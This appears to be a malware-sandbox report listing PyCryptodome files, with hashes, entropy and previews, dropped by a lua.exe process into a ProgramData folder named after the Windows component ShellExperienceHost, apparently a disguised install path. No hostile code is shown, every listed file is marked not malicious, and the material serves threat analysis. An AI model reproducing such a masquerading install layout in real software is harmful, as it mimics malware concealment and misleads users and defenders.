Preview:	# -- coding: utf-8 --..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ctr.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	827
Entropy (8bit):	4.593860739765962
Encrypted:	false
SSDEEP:	24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
MD5:	8A35D43812049862067E29C878476C74
SHA1:	A12D8A91A7657976F857C769188B625FA27F0697
SHA-256:	D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
SHA-512:	18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
Malicious:	false
Preview:	from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_eax.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14919
Entropy (8bit):	4.674620924403366
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IqCwPVpCaMYO4aU4GU4DdzRWPvguXnYPR:0rskrs9Vq6wS4aTGTDd1WHgi6
MD5:	43D0A8B5CC8E01A8560C9873321DB64D
SHA1:	234EA9C9E2E9AC5F7A827D20587A49A08E45AFBE
SHA-256:	00B3880FF362FD3F25961BAF401505C3D25F7AEB712D750C5B5B9244C7C39306
SHA-512:	4409A5374C31BA1B61CF9883B39DD97C4D3BCF7762A20C1125E5A36AA09FD2DC45179F5E12342E9F350598835FA70FC05078FD37268803F8207A38E14368D13A
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_eax.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	4.436811038410909
Encrypted:	false
SSDEEP:	24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
MD5:	B414CB43B46387AD1B1B2AD15F66314E
SHA1:	DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
SHA-256:	C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
SHA-512:	0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
Malicious:	false
Preview:	from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ecb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8529
Entropy (8bit):	4.499365740356179
Encrypted:	false
SSDEEP:	96:dBFQHvoWieqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWIRI:dfQHvPz8XjJYuwVkZi7Z1WIRI
MD5:	BA708C28472BF8A266985DCA4CCD93B1
SHA1:	C4E6D55A46EDEB5FDDF8A8BF15A1BA198C94815B
SHA-256:	BEB1D881C681295AE01316E857A5AB8D289A4A1B30DCF97ED405FEA5C694892A
SHA-512:	D0543D25A7AA3787CF681EBEEDEE2D9229DCB03B8D53125F7AFB40B48040E4B3F4CC912A02C86EEE1E4E2ECAD24669B89174FECC4C199BB94733B159650570A6
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ecb.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	611
Entropy (8bit):	4.857553785112337
Encrypted:	false
SSDEEP:	12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
MD5:	12949DC06561F6F7C431BFB79A4F5D05
SHA1:	68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
SHA-256:	652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
SHA-512:	5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
Malicious:	false
Preview:	from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_gcm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21978
Entropy (8bit):	4.71964240397714
Encrypted:	false
SSDEEP:	384:0rskrs9Vqjd6xv931Dir4QTdT9pXWMXDR/:0r6q0j3Er7WI/
MD5:	6CA0DA94D82749B7B83998823CC0C5C9
SHA1:	BECDE8AD6D0DDFE5DC013F52EB346C3CB24EA094
SHA-256:	BA09EA491FD7D3E10781433641C7D87BF5AAB884527E010888A8F4BBF4473F4C
SHA-512:	FB16B246EBD55E98794A95EF06DA8290F69005337832FC4123D92C2282C6AF26726C57EB3BECF39ACA080C8719A99A418C9B96CB7A2DF2353BBC0DCB82FA8BEC
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_gcm.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	4.431900531457141
Encrypted:	false
SSDEEP:	24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
MD5:	7D3D576FC1628D95451DC9436EC64091
SHA1:	742B2C357FF613BC5D5285211D3D52AA4BD6F445
SHA-256:	49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
SHA-512:	8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ocb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20319
Entropy (8bit):	4.487468407062865
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IRqz86W9yyJuCtXhf5dOvbY4yS/SHfp+afbRewJWe9q/rqOP1VbC:0rskrs9VqQqINhhd6Y40Le8WeyJP1hD2
MD5:	7BD1AB33BDFFCBBA02E767CB6627016E
SHA1:	02F7BF05128FD194380C2D6227451E3B84E21F80
SHA-256:	DE27C5B2733E2E729DDC46BBE53F5B208CBAFD900EA475B1C05F7C04FE02DD5E
SHA-512:	307F5143054B2AAC1FAA232C3FE2FF49C1553BF5A7B168EEFC9050D466771191A983229689F294D3FED358EDC3A52E5FB1B71FA439FBCB6EBEF4B4E220695FAD
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ocb.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1267
Entropy (8bit):	4.510576229003074
Encrypted:	false
SSDEEP:	24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
MD5:	76916331AA1417BD4EADDD10948D8D26
SHA1:	1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
SHA-256:	E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
SHA-512:	BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ofb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10563
Entropy (8bit):	4.474542621411218
Encrypted:	false
SSDEEP:	96:dLFQHvoPoxH4dILt52ALFxKiDqwG4rW9stU4p2EVQd77BqotU4SpqtAVsqW1mYhH:d5QHv/pwADKKqO6wU4SQ2U483amgQO
MD5:	286BE06F9BFA638EEE655F9A20B98291
SHA1:	0D737B43BE66A24369B00224652F5A471B283CFD
SHA-256:	1F0BBD609577A1A79DED33C20ADEFA7A3C505C1FA46E898511E02C7ACC3378BE
SHA-512:	71C082D666E9A0C27DD0EB8483B951CA91F07FF0DD3FB6378169C8BFBB50ED89B7343ACE58E7C928B2AB4A62A7D32BF5403F0652151ADF893FF06D5F8BB1EC75
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_ofb.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	716
Entropy (8bit):	4.736539689518066
Encrypted:	false
SSDEEP:	12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
MD5:	AFB364F0C9ADDDBA29076577257DFC52
SHA1:	208940A0B5304122118AD8E33CB8B8AF35228146
SHA-256:	C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
SHA-512:	00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
Malicious:	false
Preview:	from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_openpgp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7259
Entropy (8bit):	4.832276328481339
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/Itv4RK0tUU4cp/6U41k2T:0rskrs9Vq0J0tUTccT7
MD5:	A64ED188605DD3505B7F51513EC9397D
SHA1:	38198DDFB53F1C410999AC0622F27328F7EB3D85
SHA-256:	3F71E4528BD24F3CC96BDEA89BC1CAC2FE69FC198C4DB07BFD0A1C997827FAE4
SHA-512:	0559C532F2D2B5DF2994AA16C0204C2AC27283B5540530BD1F069BC46A4C1F6A5E8142976DF29AC112B7F24E49200EA2DCF7C0C3BB1E537B559E2D616D148732
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_openpgp.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	576
Entropy (8bit):	4.621504702467695
Encrypted:	false
SSDEEP:	12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
MD5:	C1EADE4DE0796F8C003DBB655E410274
SHA1:	283080AEFA8D7F00772CE108277688D55519EF46
SHA-256:	5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
SHA-512:	3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_siv.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14454
Entropy (8bit):	4.78198429721235
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IK31IzSsGJ+KLk3eNVkr0PHA5sLzL64iYVRWeOL4ooPjTo0Bk+Y:0rskrs9Vqp1pXNVkr0PHyMXYYXWQtHUX
MD5:	C170693E41AF2DC3BFC81B24CBC64A06
SHA1:	9DAAC5769AD88A3CC6F2E91C09B90720FC86FB0D
SHA-256:	311746A6AC2CDBE6F823745EAF4A7108B5014542C7CF1B07FC28000A00DED7EA
SHA-512:	196169CE4543E4645AA23AE4C244612C91A99D752032C6546BEA2074A2F46B297818BE613B880E7DE8E5003B0A962CCFA40B145070478B2B7AE0CAB5811430F4
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_mode_siv.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1299
Entropy (8bit):	4.379657025743841
Encrypted:	false
SSDEEP:	24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
MD5:	FB584A8E53BC1B138B3932BDF16901D5
SHA1:	CF4F2426C15F17BD613A304B3E7F19A181E2035E
SHA-256:	80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
SHA-512:	05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
Malicious:	false
Preview:	from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	6.59856760757559
Encrypted:	false
SSDEEP:	384:kOISQpPUUllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52E0H680xz4L:QLh7JbH1G4sS4j990th9VBFI
MD5:	E6C16A8F39EB63EE3C75C3498BCCB35D
SHA1:	B28CFDAB4F11B1AD1FFE52847B275FB3B356FE2A
SHA-256:	6E1AE3D0BAE24C9641D96719EB4E941A6ED17C1E1B90D8B7478D6F7CBF9C4D9F
SHA-512:	DAA2FF6E68FBE8062E46433FDD32382CE88DADCAC400A6882961828583E73BBFBEA1BCA80690B13BA650E9E899B7EF41A86FAAFCCF1719868CDBFDBC07623820
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...t.!`.........." .....H...F......T.....................................................`.........................................0...........d...............................0......................................8............`...............................text....G.......H.................. ..`.rdata...5...`...6...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.181553116220921
Encrypted:	false
SSDEEP:	192:9ne15je/I3TuvPfB1LeLi2jcXdq2QdeJgDZE0DRcYcaKAADLU5YUod:9K2Y6/B1KL4XdQdggDZpEU5YUm
MD5:	39AC37BFCD6145B861A6201620E960FC
SHA1:	EAA251E287B0A40965BB07B5400583B8BFD47139
SHA-256:	5A8D3E59A36F835522D06B3BFBCA2C61DBF8F5093BA70C0DD436C35E9232D0B6
SHA-512:	9A39796AF9C7FACF32D251E89D46BB9386376BD7B6F630842E21F78AA6FADDAA7BE75EB6DFA3EEA36677FC6811630CF687CC7E21D7EB47A47A3B4639AF0F4A17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................[........................*.......................................7............Rich....................PE..d...t.!`.........." ......... ......T.....................................................`.........................................p9.......:..d....`.......P...............p..$....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.40089079599851
Encrypted:	false
SSDEEP:	192:QEJe0rPeLTuUt4/wgroOCouz7ucc9dJ7oANokDLU45Gc:KmUGr9n6769UaU45
MD5:	11B6C4E3A2A7BB439B45DB01F0D866AC
SHA1:	23ECF53CC4FD3E07A62ADE57EB284002918E8411
SHA-256:	426296D0002838570BE4647B0D366C4FCE6D4BCCD591BFB43D2A25DDC124166D
SHA-512:	CA0B0868457F1C817ED7E1CED599ADE571519EBEA40BA2EE6B1B060C8F8D1C5D902CADA884836C9A2E45ACBC67240E21968997290EEA50F4911BD7AC051221A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...t.!`.........." ....."... ......T.....................................................`.........................................@I.......I..d....p.......`..................$....B...............................B..8............@...............................text...8 .......".................. ..`.rdata.......@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	6.159198790756915
Encrypted:	false
SSDEEP:	192:PUpJ7Grjup/vx81AguKUiZA3OkJYkO8d3KobfoHJAyZJg8D0KThxA+rAQE+tnJiD:j2XKAs3ZArTvHbgpJgLa0Mp8OxhUoz
